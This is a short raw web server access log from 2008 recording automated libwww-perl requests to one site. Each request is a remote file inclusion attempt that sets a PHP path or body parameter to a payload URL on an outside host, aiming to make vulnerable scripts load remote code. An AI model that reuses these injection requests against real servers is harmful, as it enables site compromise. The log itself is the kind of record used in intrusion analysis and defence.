67.212.173.42 - - [17/Apr/2008:14:10:42 -0700] "GET /index.php?body=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:11:43 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:11:44 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.12.214 - - [17/Apr/2008:14:11:44 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:14:11:48 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:14:11:48 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
